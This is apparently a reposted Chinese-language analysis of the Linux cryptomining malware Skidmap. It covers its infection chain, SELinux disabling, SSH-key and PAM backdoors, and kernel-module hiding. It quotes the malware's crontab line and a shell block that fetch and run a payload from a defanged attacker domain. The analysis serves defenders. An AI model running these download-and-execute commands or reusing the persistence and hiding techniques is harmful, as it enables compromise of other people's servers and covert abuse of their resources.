您当前的位置:首页 > 电脑百科 > 安全防护 > 木马

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

时间:2019-09-26 13:25:04  来源:  作者:
借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

 

加密货币挖掘恶意软件是一种普遍存在网络威胁,不止是windows系统,如今你在移动设备、Unix和类Unix系统,甚至是服务器和云环境中,都可以见到它们的身影。

此外,它们的反检测能力也在不断提高。例如,有些恶意软件就与Watchdog(linux看门狗)组件捆绑在一起,以确保加密货币挖掘活动不会被系统监控工具监测到。

Skidmap就是这样一种恶意软件,借助独特的内核模块加载方式,它不仅很难被检测出来,而且还允许攻击者不受限制地访问受感染系统。

Skidmap的感染链

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图1.Skidmap的感染链

首先,Skidmap通过crontab将自己安装到目标机器上,如下所示:

*/1 * * * * curl -fsSL hxxp://pm[.]ipfswallet[.]tk/pm.sh | sh

接下来,Skidmap就会下载主二进制文件“pc”:

if [ -x "/usr/bin/wget" -o -x "/bin/wget" ]; then
 wget -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/curl" -o -x "/bin/curl" ]; then
 curl -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/get" -o -x "/bin/get" ]; then
 get -c hxxp://pm[.]ipfswallet[.]tk/pc -O /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc elif [ -x "/usr/bin/cur" -o -x "/bin/cur" ]; then
 cur -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc else
 url -fs hxxp://pm[.]ipfswallet[.]tk/pc -o /var/lib/pc && chmod +x /var/lib/pc && /var/lib/pc fi

执行二进制文件“pc”,受感染系统的安全设置将被降低。

如果文件“/ usr / sbin / setenforce”存在,那么Skidmap则将执行命令“setenforce 0”。此命令会将系统的Security-Enhanced Linux(SELinux)模块配置为允许模式。

如果文件“/ etc / selinux / config”存在,那么Skidmap则会将这些命令“:SELINUX = disabled”和“SELINUXTYPE = targeted”写入该文件。前者用于禁用SELinux策略,后者用于将选定的进程设置为在受限域中运行。

此外,Skidmap还会设置了一种获取后门访问受感染系统的方法。它通过让二进制文件将其处理程序的公钥添加到“authorized_keys”文件来完成此操作,该文件包含身份验证所需的密钥。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图2. Skidmap获取对受感染系统的后门访问权限

除了后门访问,Skidmap还为会攻击者创建另一种访问受感染系统的方法——将系统文件“pam_unix.so”替换为恶意版本。如图3所示,恶意版本的“pam_unix.so”文件接受任何用户的特定密码,从而允许攻击者以任何用户身份登录受感染系统。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图3. Skidmap利用恶意版本的“pam_unix.so”文件来访问受感染系统

Skidmap如何释放加密货币挖掘程序

二进制文件“pc”首先检查受感染系统的操作系统是Debian还是RHEL/centos,以此来决定将要释放的加密货币挖掘程序和其他组件。

对于基于Debian的系统,它会将加密货币挖掘程序释放到“/tmp/miner2”。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图4. 二进制文件“pc”在基于Debian的系统中释放加密货币挖掘程序

对于基于CentOS/RHEL的系统,它将从“hxxp://pm[.]ipfswallet[.]tk/cos7[.]tar[.]gz]”下载一个tar压缩文件,其中就包含了加密货币挖掘程序和多个组件,这些组件将在解压缩后安装。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图5. 二进制文件“pc”在基于RHEL/CentOS的系统中释放加密货币挖掘程序

Skidmap的其他恶意组件

Skidmap还有多个值得注意的组件,它们旨在进一步隐藏加密货币挖掘活动:

一个恶意版本的“rm”二进制文件-这个文件用于替换系统原始的“rm”文件(rm通常用作删除文件的命令),进而设置一个恶意的cron定时任务,可以下载并执行文件。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图6.恶意版本的“rm”二进制文件设置的cron定时任务

Kaudited-安装为/ usr / bin / kaudited的文件。这个二进制文件将释放并在受感染系统上安装多个可加载的内核模块(LKM)以及用于监视加密货币挖掘程序文件和进程的监视程序组件。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图7. 由Kaudited释放的内核模块


借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图8.由Kaudited释放的监视程序组件

Iproute-这个组件挂钩系统调用,使用getdents(通常用于读取目录的内容)隐藏特定文件。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图9. Iproute使用getdents隐藏特定文件

Netlink-一个能够伪造网络流量统计信息(特别是涉及某些IP地址和端口的流量)以及CPU统计信息的组件,这将导致受感染系统的CPU使用率始终显示为低。

借你的服务器挖下矿!新型Linux恶意软件“Skidmap”来袭

图10.用于实现CPU使用率始终显示为低的代码片段

结论

Skidmap使用了一些相对高级的方法来确保它自身及其组件很难被检测出来,如独特的内核模块加载方式。再加上能够替换系统原始文件的能力,这使得它与其他恶意软件相比更加难以被清理。

此外,Skidmap还能够创建多种允许攻击者访问受感染系统的方法,这使得它即使被清理,也能够重新感染已恢复正常的系统,从而继续加密货币挖掘活动,降低服务器或工作站的性能。



Tags:Skidmap   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
加密货币挖掘恶意软件是一种普遍存在网络威胁,不止是Windows系统,如今你在移动设备、Unix和类Unix系统,甚至是服务器和云环境中,都可以见到它们的身影。此外,它们的反检测能力也...【详细内容】
2019-09-26  Tags: Skidmap  点击:(291)  评论:(0)  加入收藏
▌简易百科推荐
log4j漏洞的形成原因已经有很多分析文章了,这里说一说我是如何在了解到有漏洞后,跟进漏洞产生原理的,以及发现的一些绕WAF tips跟进漏洞产生原因的思路如何发现漏洞产生的原因...【详细内容】
2021-12-22  IT野涵    Tags:og4j漏洞   点击:(8)  评论:(0)  加入收藏
新型Android恶意木马程序伪装成数十款街机、射击和策略游戏,通过华为应用市场AppGallery进行分发,从而窃取设备信息和用户的手机号码,全球目前至少有930万台Android设备被该恶...【详细内容】
2021-12-01  极牛网    Tags:恶意木马   点击:(24)  评论:(0)  加入收藏
导读:在日常电脑使用中,很多小伙伴都会从互联网下载网站或是QQ、微信等聊天软件中进行传输安装软件、文件等。略知网络安全的朋友们都会比较谨慎所安装的软件是否安全,比如说通...【详细内容】
2021-09-10  极客小君    Tags:木马   点击:(58)  评论:(0)  加入收藏
编程语言: Nodejs知识要点: 文件的16进制解析木马我们见得多, 以前多数会以EXE可执行文件形式出现后来, 开始在Web上出现, 主要侵扰Web页面, 给正常的HTML/ASP等加上木马代...【详细内容】
2021-08-04  代码大叔    Tags:特洛伊木马   点击:(69)  评论:(0)  加入收藏
恶意代码的分类包括计算机病毒、蠕虫、木马、后门、Rootkit、流氓软件、间谍软件、广告软件、僵尸(bot) 、Exploit等等,有些技术经常用到,有的也是必然用到。恶意代码常见功能...【详细内容】
2020-12-14      Tags:恶意代码   点击:(131)  评论:(0)  加入收藏
近日,公安部网安局微信公众号发布了一则重要提醒:警惕身边的共享充电宝陷阱。警方表示,我们常使用的共享充电宝可能被植入木马程序,一旦插入手机,可能就会盗取个人信息。360网络...【详细内容】
2020-12-08      Tags:木马   点击:(144)  评论:(0)  加入收藏
前言这次检查并不是帮我,而是帮一位粉丝。当时私聊我的时候我还挺高兴的,至少得到了认可。 这次文章我也征求了他的同意才发出来的。也请别说我侵犯他人隐私。 过程早上醒...【详细内容】
2020-08-31      Tags:程序后门   点击:(149)  评论:(0)  加入收藏
本周初的时候,忽然发现部门服务器C盘动不动就满了,导致应用程序全都停止响应了。当时很是奇怪,C盘剩余的十几个G不应该在两天之内就被占满了呀。怀疑归怀疑,因为太忙,就没太管。...【详细内容】
2020-07-19      Tags:木马   点击:(97)  评论:(0)  加入收藏
能直接从账户盗走钱财的银行木马,一直被称为是恶意软件中最邪恶的一种。近日,360安全大脑独家发布《深度揭露Anubis移动银行木马》报告,全面披露了近期瞄准全球300多国家银行...【详细内容】
2020-04-24      Tags:木马突袭   点击:(130)  评论:(0)  加入收藏
相信大家都有这么一个经历,我们使用电脑,在某些来历不明的网站上下载一些程序,然后打开这些程序的时候,可能会出现以下的情况。 嗯没错,你电脑中的杀毒软件会给你发出温馨的提示,...【详细内容】
2020-04-07      Tags:木马病毒   点击:(169)  评论:(0)  加入收藏
相关文章
    无相关信息
最新更新
栏目热门
栏目头条